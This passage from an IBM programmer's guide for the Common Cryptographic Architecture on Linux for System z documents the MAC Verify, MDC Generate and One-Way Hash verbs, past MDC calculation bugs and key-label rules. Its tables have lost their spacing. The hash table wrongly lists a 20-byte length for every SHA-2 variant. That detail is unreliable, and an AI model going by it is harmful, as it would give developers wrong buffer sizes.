Verifiesa4-byteMACvaluerepresentedastwogroupsof4hexadecimalcharacterswithaspace +characterbetweenthegroups. +MACLEN4 Verifiesa4-byteMACvalue.Thisisthedefaultvalue. +MACLEN6 Verifiesa6-byteMACvalue. +MACLEN8 Verifiesan8-byteMACvalue. +chaining_vector +Direction: Input/Output Type: String +An 18-byte string CCAuses as a system work area. Your application program must not change the +data in this string. The chaining vector permits data to be chained from one invocation call to another. +On the first call, initialize this parameter to binary zeros. +mac +Direction: Input Type: String +The 8-byte or 9-byte field that contains the MAC value you want to verify. The value in the field must +be left-justified and padded with zeros. If you specified the HEX-9 keyword in the rule_array +parameter, the input MAC is nine bytes in length. +Restrictions +It might seem intuitive that a DATAM key should also be usable for the MAC Generate verb, and a +DATAMV key for the MAC Verify verb, with the CPACF exploitation layer. However, this would violate the +security restrictions imposed by the user when the user creates a key of type DATAM or DATAMV.ADES +key that has been translated for use with the CPACF (see “CPACF support” on page 8) can be used with +CPACF DES encrypt and decrypt operations, an operation that is by definition not allowed for a DATAM or +DATAMV key type.Also note that by definition both through z/OS CCA-ICSF and in this S390 Linux CCA +access layer, a DATAkey of 16 bytes or 24 bytes in length is restricted from use with the X9.19OPT and +EMVMACD rule_array keyword specified MAC algorithms. The only available MAC algorithm for a 16-byte +or 24-byte DATAkey is the TDES-MAC algorithm. +Also note that the CPACF exploitation layer is activated only for MAC Generate or MAC Verify calls that +specify the ONLY rule_array keyword for segmenting control (this is the default segmenting control if no +segmenting control rule_array keyword is specified). The reason for this is that the intermediate MAC +context for normal CEX3CC calls to MAC Generate and MAC Verify is protected by the adapter Master +Key. Because the same security cannot be provided for intermediate results from the host-based CPACF +exploitation layer (they are returned in the clear by the CPACF) the FIRST, MIDDLE, and LAST +segmenting control keywords will direct operations to the CEX3C. +Required commands +| This verb requires the MAC Verify command (offset X'0011') to be enabled in the active role. +Usage notes +To verify a MAC in one call, specify the ONLY keyword on the segmenting rule keyword for the rule_array +parameter. For two or more calls, specify the FIRST keyword for the first input block, MIDDLE for +intermediate blocks (if any), and LAST for the last block. +For a given text string, the MAC resulting from the verification process is the same regardless of how the +text is segmented or how it was segmented when the original MAC was generated. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 247 + +MAC Verify (CSNBMVR) +Related information +The MAC Generate verb is described in “MAC Generate (CSNBMGN)” on page 241. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBMVRJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBMVRJ are shown here. +Format +public native void CSNBMVRJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_identifier, +hikmNativeInteger text_length, +byte[] text, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] chaining_vector, +byte[] MAC); +248 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MDC Generate (CSNBMDG) +MDC Generate (CSNBMDG) +IMPORTANT NOTICE +In releases before Release 3.30, it was discovered that under certain conditions the MDC Generate +verb produced incorrect MDC values. Beginning with Release 3.30.05, these conditions no longer +produce incorrect results. +If you have MDC values that were generated using a release before Release 3.30.05, corrective +action might be required before using these values with Release 3.30 (or later) to validate data +integrity. See “Related information” on page 252 for detailed information. +Use this verb to create a 128-bit hash value (Modification Detection Code) on a data string whose integrity +you intend to confirm.After using this verb to generate an MDC, you can compare the MDC to a known +value or communicate the value to another entity so that they can compare the MDC hash value to one +that they calculate. This verb enables you to perform the following tasks: +v Specify the two-encipherment or four-encipherment version of the algorithm. +v Segment your text into a series of verb calls. +v Use the default or a keyed-hash algorithm. +The user must enable the Generate MDC command with a Trusted Key Entry (TKE) workstation before +using this verb. +For a description of the MDC calculations, see “Modification Detection Code calculation” on page 493. +Specifying two or four encipherments: Four encipherments per algorithm round improve security; two +encipherments per algorithm round improve performance. To specify the number of encipherments, use +the MDC-2, MDC-4, PADMDC-2, or PADMDC-4 keyword with the rule_array parameter. Two +encipherments create results that differ from four encipherments; ensure that the same number of +encipherments are used to verify the MDC. +Segmenting text: This verb lets you segment text into a series of verb calls. If you can present all of the +data to be hashed in a single invocation of the verb (32 MB) of data, use the rule_array keyword ONLY. +Alternatively, you can segment your text and present the segments with a series of verb calls. Use the +rule_array keywords FIRST and LAST for the first and last segments. If more than two segments are used, +specify the rule_array keyword MIDDLE for the additional segments. +Between verb calls, unprocessed text data and intermediate information from the partial MDC calculation is +stored in the chaining_vector variable and the MDC key in the MDC variable. During segmented +processing, the application program must not change the data in either of these variables. +Keyed hash: This verb can be used with a default key, or as a keyed-hash algorithm.Adefault key is +used whenever the ONLY or FIRST segmenting and key control keywords are used. To use the verb as a +keyed-hash algorithm, do the following: +1. On the first call to the verb, place the non-null key into the MDC variable. +2. Ensure that the chaining_vector variable is set to null (18 bytes of X'00'). +3. Decide if the text will be processed in a single segment or multiple segments. +v For a single segment of text, use the LAST keyword. +v For multiple segments of text, begin with the MIDDLE keyword and continue using the MIDDLE +keyword up to the final segment of text. For the final segment, use the LAST keyword. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 249 + +MDC Generate (CSNBMDG) +As with the default key, you must not alter the value of the MDC or chaining_vector variables between +calls. +Format +CSNBMDG( +return_code, +reason_code, +exit_data_length, +exit_data, +text_length, +text, +rule_array_count, +rule_array, +chaining_vector, +MDC ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +text_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the text variable. See +“Restrictions” on page 251. +text +Direction: Input Type: String +Apointer to a string variable containing the text for which the verb calculates the MDC value. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value can be 0, 1, or 2. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb.Akeyword specifies the method for calculating +the RSAdigital signature. Each keyword is left-justified in an 8-byte field and padded on the right with +blanks.All keywords must be in contiguous storage. The rule_array keywords are described in +Table62. +Table62.KeywordsforMDCGeneratecontrolinformation +Keyword Description +Segmentingandkeycontrol(One,optional) +ONLY Specifiesthatsegmentingisnotusedandthedefaultkeyisused.Thisisthedefault. +FIRST Specifiesthefirstsegmentoftext,anduseofthedefaultkey. +MIDDLE Specifiesanintermediatesegmentoftext,orthefirstsegmentoftextanduseofauser-supplied +key. +LAST Specifiesthelastsegmentoftext,orthatsegmentingisnotused,anduseofauser-suppliedkey. +Algorithmmode(One,optional) +MDC-2 Specifiestwoenciphermentsforeach8-byteblockusingMDCprocedures.Thisisthedefault. +250 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MDC Generate (CSNBMDG) +Table62.KeywordsforMDCGeneratecontrolinformation (continued) +Keyword Description +MDC-4 Specifiesfourenciphermentsforeach8-byteblockusingMDCprocedures. +PADMDC-2 Specifiestwoenciphermentsforeach8-byteblockusingPADMDCprocedures. +PADMDC-4 Specifiesfourenciphermentsforeach8-byteblockusingPADMDCprocedures. +chaining_vector +Direction: Input/Output Type: String +Apointer to an 18-byte string variable the security server uses as a work area to hold segmented data +between verb invocations. +IMPORTANT: When segmenting text, the application program must not change the data in this string +between verb calls to the MDC Generate verb. +MDC +Direction: Input/Output Type: String +Apointer to a user-supplied MDC key or to a 16-byte string variable containing the MDC value. This +value can be the key that the application program provides. This variable is also used to hold the +intermediate MDC result when segmenting text. +IMPORTANT: When segmenting text, the application program must not change the data in this string +between verb calls to the MDC Generate verb. +Restrictions +v When padding is requested (by specifying an algorithm mode keyword of PADMDC-2 or PADMDC-4), a +text length of zero is valid for any segment-control keyword specified in the rule_array variable FIRST, +MIDDLE, LAST, or ONLY). When LAST or ONLY is specified, the supplied text is padded with X'FF' +bytes and a padding count in the last byte to bring the total text length to the next multiple of 8 that is +greater than or equal to 16. +v When no padding is requested (by specifying an algorithm mode keyword of MDC-2 or MDC-4), the +total length of text provided (over a single or segmented calls) must be a minimum of 16 bytes and a +multiple of eight bytes. For segmented calls (that is, segmenting and key control keyword is not ONLY), +a text length of zero is valid on any of the calls. +Required commands +| In releases prior to CCA4.1.0 and for installations without CPACF support this verb requires the MDC +| Generate command (offset X'008A') to be enabled in the active role. This command is no longer required +| in CCA4.1.0 when CPACF clear-key function is available (KM, function 1), and enabled for CCAuse +| (environment variable CSU_HCPUACLR is set to '1', the default value). +The user must enable the Generate MDC command with a Trusted Key Entry (TKE) workstation before +using this verb. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBMDGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 251 + +MDC Generate (CSNBMDG) +The parameters for CSNBMDGJ are shown here. +Format +public native void CSNBMDGJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger text_length, +byte[] text_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] chaining_vector, +byte[] MDC); +Related information +In releases before Release 3.30, it was discovered that the MDC Generate verb produced incorrect MDC +values under certain conditions. If you have any MDC values generated using Release 3.30.04 or earlier, +read this section to determine what conditions produce incorrect MDC values. If necessary, take corrective +action as described below. +Audience +If you are an IBM System i®, System p®, or System x® customer of the IBM CCASupport Program who +generated MDC values using the MDC Generate (CSNBMDG) verb with Release 3.30.04 or earlier, please +read the following important information related to the integrity of your data. +Overview +It was discovered that under certain conditions, the MDC Generate verb of the CCASupport Program +generates incorrect MDC values. This section describes in detail each scenario that results in these +incorrect MDC values. +Terminology +The following terminology is used to describe the conditions that produce incorrect MDC values: +Total text length (TTL) +The total number of text bytes processed to calculate a final MDC value +Running text length (RTL) +The total number of text bytes processed by all previous calls used to calculate a final MDC value +Carryover length (COL) +The number of text bytes that could not be processed in the previous call. The COLcan range from 0 - +15 bytes, and is stored in the chaining vector between calls. +New text length (NTL) +The carryover length plus the text length for the current call +Notes: +1. An intermediate MDC calculation always operates on eight bytes of text at a time.Any remaining text +that is not a multiple of eight bytes gets passed in the chaining vector as carryover text. +2. Acall with keyword FIRST must have a text length greater than or equal to 16 in order to calculate an +intermediate MDC value. If the text length is greater than or equal to 16, the COLis calculated as text +length modulo 8, otherwise the COLequals the text length.Any carryover text bytes get passed in the +chaining vector as carryover text to the next segment call. +3. Acall with keyword MIDDLE calculates an intermediate MDC value if the text bytes to process (COL +plus text length) are greater than or equal to 16. If COLplus text length is less than 16, the text bytes +are carried over to the next call in the chaining vector. MIDDLE calls process text in multiples of 8 (for +252 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MDC Generate (CSNBMDG) +example, 16, 24, 32).As with FIRST, the remaining text bytes (NTLmodulo 8) get passed in the +chaining vector as carryover text to the next segment call. +4. An MDC value is final when calculated by keywords ONLY or LAST. +Examples: +1. Assume a text length of 19 for FIRST, 6 for MIDDLE, and 10 for LAST. +TTL = 19 + 6 + 10 = 35 bytes. +When FIRST is called, 16 of the 19 text bytes will be processed to produce an intermediate MDC. The +remaining 19 - 16 = 3 text bytes will be placed in the chaining vector. +When MIDDLE is called, RTL= 19, COL= 19 - 16 = 3, and NTL= COL+ text length = 3 + 6 = 9 bytes +to process. +After the MIDDLE call completes, RTL= 19 + 6 = 25 and COL= 25 - 16 = 9. Because 16 bytes are +not available to be processed, the 9 text bytes will be placed in the chaining vector as carryover text. +LAST will process COL+ text length = 9 + 10 = 19 bytes. The NTLfor the LAST call is 19 bytes. If the +TTLis not a multiple of 8, use of a PADMDC-2 or PADMDC-4 method is required. +2. Assume a text length of 19 for FIRST, 25 for MIDDLE, and 12 for LAST. +TTL = 19 + 25 + 12 = 56 bytes. +When FIRST is called, 16 of the 19 text bytes will be processed to produce an intermediate MDC. The +remaining 19 - 16 = 3 text bytes will be placed in the chaining vector. +When MIDDLE is called, RTL= 19, COL= 19 - 16 = 3, and NTL= COL+ text length = 3 + 25 = 28 +bytes to process. +After the MIDDLE call completes, RTL= 19 + 25 = 44, COL= 28 modulo 8 = 4, and 28 – 4 = 24 bytes +will be used to produce an intermediate MDC. The 4 text bytes will be placed in the chaining vector as +carryover text. +LAST will process COL+ text length = 4 + 12 = 16 bytes. The NTLfor the LAST call is 16 bytes. +These text bytes will be used to produce the final MDC value. +Pre-Release 3.30 problems: The following scenarios describe different situations where the MDC +Generate (CSNBMDG) verb was found to produce incorrect MDC values. These scenarios apply to +releases prior to Release 3.30. +Scenario 1 (pre-Release 3.30) +Error type: Segmentation error, not padding related. +Keywords affected: +v Algorithm MDC-2, MDC-4, PADMDC-2, PADMDC-4 +v Segmenting and key control MIDDLE +The MDC value is calculated incorrectly whenever: +v RTLis greater than or equal to 16 and +v At least one MIDDLE segment is processed that has COLplus text length less than 16. +Under the above conditions, the very next MIDDLE or LAST call loses the intermediate MDC value that +was passed on input. +WARNING:: The integrity of any data processed up to the time that the intermediate MDC value is lost +cannot be confirmed. +Example: +MDC-2, MDC-4, PADMDC-2, or PADMDC-4 +FIRST text length = 19, MIDDLE text length = 6, LAST text length greater than or equal to 0, an +incorrect MDC value is calculated. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 253 + +MDC Generate (CSNBMDG) +Corrective action: +None. The intermediate MDC value calculated when keyword FIRST was used to process the 16 bytes +of text is lost. The integrity of these first 16 bytes of data cannot be confirmed. +Scenario 2 (pre-Release 3.30) +Error type: Padding error related to segmenting. +Keywords affected: +v Algorithm PADMDC-2, PADMDC-4 +v Segmenting and key control LAST +The MDC value is calculated incorrectly whenever: +v LAST text length is equal to 0 and +v TTLis greater than or equal to 16 and +v TTLmodulo 8 is equal to 0 +Under the above conditions, 16 bytes of padding are incorrectly added to the text instead of the +required eight bytes of padding. +Example: +PADMDC-2 or PADMDC-4 +FIRST text length = 16, LAST text length = 0, an incorrect MDC value is calculated. +Corrective action: +Prior to migrating to Release 3.30.05 or later, recalculate each MDC value in the same manner used to +calculate the existing MDC value. If the newly calculated MDC value matches the older MDC value, +data integrity is confirmed.After all MDC values have been confirmed, migrate to the latest release and +recalculate each MDC value. Replace the old MDC values with the new ones. +Scenario 3 (pre-Release 3.30) +Error type: Padding error, not segmenting related. +Keywords affected: +v Algorithm PADMDC-2, PADMDC-4 +v Segmenting and key control ONLY, LAST +The MDC value is calculated incorrectly whenever: +v TTLis greater than or equal to 16 and +v TTLmodulo 8 is equal to 0 +Under the above conditions, no padding is added to the text as required. The incorrect MDC value is +identical to calling either MDC-2 or MDC-4. +Example: +PADMDC-2 or PADMDC-4 +ONLY text length is equal to 16, 24, 32, and so forth, an incorrect MDC value is calculated. The MDC +value is calculated without adding the required eight bytes of pad characters. +Corrective action: +Prior to migrating to Release 3.30.05 or later, recalculate each MDC value in the same manner used to +calculate the existing MDC value. If the newly calculated MDC value matches the older MDC value, +data integrity is confirmed.After all MDC values have been confirmed, migrate to the latest release and +recalculate each MDC value. Replace the old MDC values with the new ones. +Scenario 4 (pre-Release 3.30) +Error type: Padding error related to segmenting. +254 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MDC Generate (CSNBMDG) +Keywords affected: +v Algorithm PADMDC-2, PADMDC-4 +v Segmenting and key control FIRST, MIDDLE +The MDC value is calculated incorrectly whenever: +v RTLis greater than or equal to 16 and +v LAST is called with COLplus text length greater than zero and less than 8 +Under the above conditions, the text is padded with eight bytes more than is required. +Example: +PADMDC-2 or PADMDC-4 +FIRST text length = 16, LAST = 7, an incorrect MDC value is calculated. The MDC value is calculated +with 9 pad bytes instead of the required 1 pad byte. +Corrective action: +Prior to migrating to Release 3.30.05 or later, recalculate each MDC value in the same manner used to +calculate the existing MDC value. If the newly calculated MDC value matches the older MDC value, +data integrity is confirmed.After all MDC values have been confirmed, migrate to the latest release and +recalculate each MDC value. Replace the old MDC values with the new ones. +Scenario 5 (pre-Release 3.30) +Error type: Segmenting error, not padding related. +Keywords affected: +v Algorithm MDC-2, MDC-4, PADMDC-2, PADMDC-4 +v Segmenting and key control MIDDLE without FIRST +The MDC value is calculated incorrectly whenever: +v FIRST is not called +v For the first MIDDLE call only, text length is less than 16 +v The chaining vector is set to zero +v The MDC value on input is set to a keyed hash value not equal to the default key +Under the above conditions, the keyed hash value that the caller set in the MDC is ignored and the +MDC value is incorrectly calculated using the default key. +Example: +MDC-2, MDC-4, PADMDC-2, or PADMDC-4 +Chaining vector is set to hex zeros. +MDC value is set to a non-default key value (default key = X'5252525252525252 2525252525252525'). +MIDDLE text length = 8, LAST text length = 16, an incorrect MDC value is calculated. The MDC value +is calculated with the default key and not with the key value of the MDC parameter. +Corrective action: +Prior to migrating to Release 3.30.05 or later, recalculate each MDC value in the same manner used to +calculate the existing MDC value. If the newly calculated MDC value matches the older MDC value, +data integrity is confirmed.After all MDC values have been confirmed, migrate to the latest release and +recalculate each MDC value. Replace the old MDC values with the new ones. +Release 3.30.04 only problems: The following scenarios describe different situations where the MDC +Generate (CSNBMDG) verb was found to produce incorrect MDC values. These scenarios apply to +Release 3.30.04 only. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 255 + +MDC Generate (CSNBMDG) +Scenario 1 (Release 3.30 only) +Error type: Segmentation error, not padding related. +Keywords affected: +v Algorithm MDC-2, MDC-4, PADMDC-2, PADMDC-4 +v Segmenting and key control MIDDLE +The MDC value is calculated incorrectly whenever: +v RTLis greater than or equal to 16 and +v MIDDLE is called with COLplus text length less than 16 and +v MIDDLE is called again +Under the above conditions, the first MIDDLE call causes a subsequent MIDDLE call to lose the +intermediate MDC value passed to it on input. +WARNING:: The integrity of any data processed up to the time that the intermediate MDC value is lost +cannot be confirmed. +Example: +MDC-2, MDC-4, PADMDC-2, or PADMDC-4 +FIRST text length = 19, MIDDLE text length = 6, subsequent MIDDLE and LAST text length greater +than or equal to 0, an incorrect MDC value is calculated. The intermediate MDC value calculated when +FIRST processed the 16 bytes of text is lost. +Corrective action: +None. The intermediate MDC value calculated when keyword FIRST was used to process the 16 bytes +of text is lost. The integrity of these first 16 bytes of data cannot be confirmed. +Scenario 2 (Release 3.30 only) +Error type: Padding error related to segmenting. +Keywords affected: +v Algorithm PADMDC-2, PADMDC-4 +v Segmenting and key control LAST +The MDC value is calculated incorrectly whenever: +v LAST text length is equal to 0 and +v TTLis greater than or equal to 16 and +v TTLmodulo 8 is equal to 0 +Under the above conditions, 16 bytes of padding are added to the text instead of the required eight +bytes of padding. +Example: +PADMDC-2 or PADMDC-4 +FIRST text length = 16, LAST text length = 0, an incorrect MDC value is calculated. +Corrective action: +Prior to migrating to Release 3.30.05 or later, recalculate each MDC value in the same manner used to +calculate the existing MDC value. If the newly calculated MDC value matches the older MDC value, +data integrity is confirmed.After all MDC values have been confirmed, migrate to the latest release and +recalculate each MDC value. Replace the old MDC values with the new ones. +Scenario 3 (Release 3.30 only) +Error type: Padding error related to segmenting. +Keywords affected: +256 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MDC Generate (CSNBMDG) +v Algorithm PADMDC-2, PADMDC-4 +v Segmenting and key control LAST +The MDC value is calculated incorrectly whenever: +v TTLis greater than zero and less than 8 +Under the above conditions, the text is incorrectly padded with 8 pad bytes less than required. +Example: +PADMDC-2 or PADMDC-4 +LAST text length = 7, an incorrect MDC value is calculated. The MDC value is calculated with only one +pad byte instead of the required 9 pad bytes. +Corrective action: +Prior to migrating to Release 3.30.05 or later, recalculate each MDC value in the same manner used to +calculate the existing MDC value. If the newly calculated MDC value matches the older MDC value, +data integrity is confirmed.After all MDC values have been confirmed, migrate to the latest release and +recalculate each MDC value. Replace the old MDC values with the new ones +Chapter7.Verifyingdataintegrityandauthenticatingmessages 257 + +One-Way Hash (CSNBOWH) +One-Way Hash (CSNBOWH) +Use the One-Way Hash verb to generate a one-way hash on specified text. +These SHAbased hashing functions are supported with the CPACF exploitation layer: SHA-1, SHA-224, +SHA-256, SHA-384, SHA-512. For details about CPACF, see “CPACF support” on page 8. +Format +CSNBOWH( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +text_length, +text, +chaining_vector_length, +chaining_vector, +hash_length, +hash ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1 or 2. +rule_array +Direction: Input Type: String +These keywords provide control information to the verb. The optional chaining flag keyword indicates +whether calls to this verb are chained together logically to overcome buffer size limitations. Each +keyword is left-justified in an 8-byte field and padded on the right with blanks.All keywords must be in +contiguous storage. The rule_array keywords are described in Table63. +Table63.KeywordsforOne-WayHashcontrolinformation +Keyword Description +| Hashmethod(One,required) +MD5 HashalgorithmisMD5algorithm.UsethishashmethodforPKCS-1.0andPKCS-1.1.Lengthof +hashgeneratedis16bytes. +RPMD-160 HashalgorithmisRIPEMD-160.Lengthofhashgeneratedis20bytes. +SHA-1 HashalgorithmisSHA-1algorithm.Lengthofhashgeneratedis20bytes. +SHA-224 HashalgorithmisSHA-224algorithm.Lengthofhashgeneratedis20bytes. +SHA-256 HashalgorithmisSHA-256algorithm.Lengthofhashgeneratedis20bytes. +SHA-384 HashalgorithmisSHA-384algorithm.Lengthofhashgeneratedis20bytes. +SHA-512 HashalgorithmisSHA-512algorithm.Lengthofhashgeneratedis20bytes. +| Chainingflag(One,optional) +258 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +One-Way Hash (CSNBOWH) +Table63.KeywordsforOne-WayHashcontrolinformation (continued) +Keyword Description +FIRST Specifiesthisisthefirstcallinaseriesofchainedcalls.Intermediateresultsarestoredinthehash +field. +LAST Specifiesthisisthelastcallinaseriesofchainedcalls. +MIDDLE Specifiesthisisamiddlecallinaseriesofchainedcalls.Intermediateresultsarestoredinthe +hashfield. +ONLY Specifiesthisistheonlycallandthecallisnotchained.Thisisthedefault. +text_length +Direction: Input Type: Integer +The length of the text parameter in bytes. +Note: If you specify the FIRST or MIDDLE keyword, the text length must be a multiple of the block +size of the hash method. For MD5, RPMD-160, and SHA-1, this is a multiple of 64 bytes. +For ONLY and LAST, this verb performs the required padding according to the algorithm +specified. +text +Direction: Input Type: String +The application-supplied text on which this verb performs the hash. +chaining_vector_length +Direction: Input Type: Integer +The byte length of the chaining_vector parameter. This must be 128 bytes. +chaining_vector +Direction: Input/Output Type: String +This field is a 128-byte work area. Your application must not change the data in this string. The +chaining vector permits chaining data from one call to another. +hash_length +Direction: Input Type: Integer +The length of the supplied hash field in bytes. +Note: For SHA-1 and RPMD-160 this must be a minimum of 20 bytes. For MD5 this must be a +minimum of 16 bytes. +hash +Direction: Input/Output Type: String +This field contains the hash, left-justified. The processing of the rest of the field depends on the +implementation. If you specify the FIRST or MIDDLE keyword, this field contains the intermediate hash +value. Your application must not change the data in this field between the sequence of FIRST, +MIDDLE, and LAST calls for a specific message. +Restrictions +None +Chapter7.Verifyingdataintegrityandauthenticatingmessages 259 + +One-Way Hash (CSNBOWH) +Required commands +None +Usage notes +Although the algorithms accept zero bit length text, it is not supported for any hashing method. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBOWHJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBOWHJ are shown here. +Format +public native void CSNBOWHJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger text_length, +byte[] text, +hikmNativeInteger chaining_vector_length, +byte[] chaining_vector, +hikmNativeInteger hash_length, +byte[] hash ); +260 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 8. Key storage mechanisms +This chapter describes how you can use key storage mechanisms and the associated key record verbs to +perform operations on key tokens and key records located inAES, DES, and PKAkey storage.A +key-token record consists of a key-token name (key label) and a key token of format null, internal, or +external. The operations to be performed are: creating, writing, reading, listing, and deleting key tokens or +key records. +The verbs described in this chapter include: +v “AES Key Record Create (CSNBAKRC)” on page 267 +v “AES Key Record Delete (CSNBAKRD)” on page 269 +v “AES Key Record List (CSNBAKRL)” on page 271 +v “AES Key Record Read (CSNBAKRR)” on page 274 +v “AES Key Record Write (CSNBAKRW)” on page 276 +v “DES Key Record Create (CSNBKRC)” on page 278 +v “DES Key Record Delete (CSNBKRD)” on page 280 +v “DES Key Record List (CSNBKRL)” on page 282 +v “DES Key Record Read (CSNBKRR)” on page 284 +v “DES Key Record Write (CSNBKRW)” on page 286 +v “PKAKey Record Create (CSNDKRC)” on page 288 +v “PKAKey Record Delete (CSNDKRD)” on page 290 +v “PKAKey Record List (CSNDKRL)” on page 292 +v “PKAKey Record Read (CSNDKRR)” on page 295 +v “PKAKey Record Write (CSNDKRW)” on page 297 +v “Retained Key Delete (CSNDRKD)” on page 299 +v “Retained Key List (CSNDRKL)” on page 301 +Key labels and key-storage management +Use the verbs described in this section to manageAES, DES, and PKAkey storage. The CCAsoftware +manages key storage as an indexed repository of key records.Access key storage using a key label with +verbs that have a key-label or key-identifier parameter. +An independent key-storage system can be used to manage records forAES key records, DES key +records, and PKAkey records: +AES key storage Holds null and internalAES key tokens +DES key storage Holds null, external, and internal DES key tokens +PKAkey storage Holds null PKAkey tokens, and both internal and external public and +private PKAkey tokens +Private RSAkeys are generated and optionally retained within the coprocessor using the PKAKey +Generate verb. Depending on the other uses for coprocessor storage, between 75 and 150 keys can +normally be retained within the coprocessor. +Key storage must be initialized before any records are created. Before a key token can be stored in key +storage, a key-storage record must be created using theAES Key Record Create, DES Key Record +Create, or PKAKey Record Create verb. +©CopyrightIBMCorp.2007,2011 261 + +Use theAES Key Record Delete, DES Key Record Delete, or PKAKey Record Delete verb to delete a key +token from a key record, or to entirely delete the key record from key storage. +Use theAES Key Record List, DES Key Record List, or PKAKey Record List verb to determine the +existence of key records in key storage. These list verbs create a key-record-list file with information about +select key records. The wildcard character, represented by an asterisk (*), is used to obtain information +about multiple key records. The file can be read using conventional workstation-data-management +services. +Individual key tokens can be read using theAES Key Record Read, DES Key Record Read, and PKAKey +Record Read verbs or written using theAES Key Record Write, DES Key Record Write, and PKAKey +Record Write verbs. +Environment variables for the key storage file +These environment variables contain the name of the key storage file. There is one for each type:AES, +DES, and PKA. +CSUAESDS AES key storage file. +CSUDESDS DES key storage file. +CSUPKADS PKAkey storage file. +See also “Dual Support: Key storage interactions” on page 551. +Key-label content +Use a key label to identify a record in key storage managed by a CCAimplementation. The key label must +be left-aligned in the 64-byte string variable used as input to the verb. Some verbs use a key label while +others use a key identifier. Calls that use a key identifier accept either a key token or a key label. +Akey-label character string has the following properties: +v It contains 64 bytes of data. +v The first character is within the range X'20' - X'FE'. If the first character is within this range, the input is +treated as a key label, even if it is otherwise not valid. Inputs beginning with a byte valued in the range +X'00' - X'1F' are considered to be some form of key token.Afirst byte valued to X'FF' is not valid. +v The first character of the key label cannot be numeric (0 - 9). +v The label is ended by a space character on the right (inASCII it is X'20', and in EBCDIC it is X'40'). The +remainder of the 64-byte field is padded with space characters. +v Construct a label with 1 - 7 name tokens, each separated by a period (.). The key label must not end +with a period. +v Aname token consists of 1 - 8 characters in the character setA- Z, 0 - 9, and three additional +characters relating to different character symbols in the various national language character sets as +listed in Table64. +Table64.Validsymbolsforthenametoken +ASCIIsystems EBCDICsystems USAgraphic(forreference) +X'23' X'7B' # +X'24' X'5B' $ +X'40' X'7C' @ +The alphabetic and numeric characters and the period should be encoded in the normal character set +for the computing platform that is in use, eitherASCII or EBCDIC. +Notes: +1. Some CCAimplementations accept the characters a - z and fold these to their uppercase +equivalents,A- Z. For compatibility reasons, only use the uppercase alphabetic characters. +262 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +2. Some implementations internally transform the EBCDIC encoding of a key label to anASCII string. +Also, the label might be put in tokenized form by dropping the periods and formatting each name +token into 8-byte groups, padded on the right with space characters. +Some verbs accept a key label containing a wild card represented by an asterisk (*). (X'2A' inASCII; X'5C' +in EBCDIC). When a verb permits the use of a wild card, the wild card can appear as the first character, +as the last character, or as the only character in a name token.Any of the name tokens can contain a wild +card. +Examples of valid key labels include the following: +A +ABCD.2.3.4.5555 +ABCDEFGH +BANKSYS.XXXXX.43*.PDQ +Examples of key labels that are not valid are listed in Table65. +Table65.Keylabelsthatarenotvalid +Keylabelnotvalid Problemwithkeylabel +A/.B Aslashisanunacceptablecharacter +ABCDEFGH9 Nametokenisgreaterthan8characters +1111111.2.3.4.55555 Firstcharactercannotbenumeric +A1111111.2.3.4.55555.6.7.8 Numberofnametokensexceeds7 +BANKSYS.XXXXX.*43*.D Numberofwildcardsexceeds1 +A.B. Lastcharactercannotbeaperiod +Key storage with Linux for IBM System z, in contrast to z/OS for IBM +System z +Key storage for IBM z/OS and for Linux on the IBM platforms other than IBM System z, diverged in design +at their very inception. +Background information about master key management +| There are four types (or sets) of master keys (Symmetric DES,AES,Asymmetric RSA(PKA), andAPKA). +| There are three master key registers for each of the four types of master key. In other words, there are a +| total of twelve master key registers. +| TheAPKAmaster-key register set, introduced to CCAbeginning with Release 4.1.0, is used to encrypt and +| decrypt the Object Protection Key (OPK) that is itself used to wrap the key material of an Elliptic Curve +| Cryptography (ECC) key. ECC keys are asymmetric. +For each of the four types, there is a master key register in one of these three categories: +New master-key (NMK) register +This register holds a master key that is not yet usable for decrypting key tokens for normal +cryptographic operations. +The NMK register can be in one of these states: +EMPTY +No key parts have been loaded yet. +Chapter8.Keystoragemechanisms 263 + +PARTIALLY FULL +Some key parts have been 